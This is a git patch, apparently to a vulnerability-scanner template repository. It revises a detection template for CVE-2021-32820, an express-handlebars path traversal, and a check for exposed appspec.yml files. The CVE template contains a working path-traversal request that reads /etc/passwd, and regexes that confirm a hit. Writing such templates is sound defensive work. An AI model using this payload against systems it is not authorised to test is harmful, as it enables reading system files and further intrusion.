From 7d727830903e68b911665dccddc57dbd8f3ddbc7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 16:32:37 +0530 Subject: [PATCH] WIP improvements --- cves/2021/CVE-2021-32820.yaml | 15 ++++++++++----- exposures/configs/appsec-yml-disclosure.yaml | 18 +++++++----------- 2 files changed, 17 insertions(+), 16 deletions(-) diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index fd3af8498d..b8ba0eb246 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -4,21 +4,26 @@ info: name: Express-handlebars Path Traversal author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json - tags: cve,cve2021,express,lfi + reference: | + - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json + tags: cve,cve2021,expressjs,lfi requests: - method: GET path: - "{{BaseURL}}/?layout=/etc/passwd" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - - "\\s*root:[x*]" - - "\\s*daemon:[x*]" - - "\\s*operator:[x*]:" + - "root:[x*]:0:0:" + - "daemon:[x*]:0:0:" + - "operator:[x*]:0:0:" part: body + condition: or diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml index 56ce5522aa..291d27d117 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -12,22 +12,18 @@ requests: path: - "{{BaseURL}}/appspec.yml" - "{{BaseURL}}/appspec.yaml" + matchers-condition: and matchers: - type: word words: - - "\"version\"" - - "\"os\"" - - "\"files\"" - - "\"permissions\"" - - "\"hooks\"" - - "\"BeforeInstall\"" - - "\"ApplicationStart\"" + - "version:" + - "os:" + - "files:" + - "source:" part: body - - type: word - words: - - "application/yaml" - part: header + condition: and + - type: status status: - 200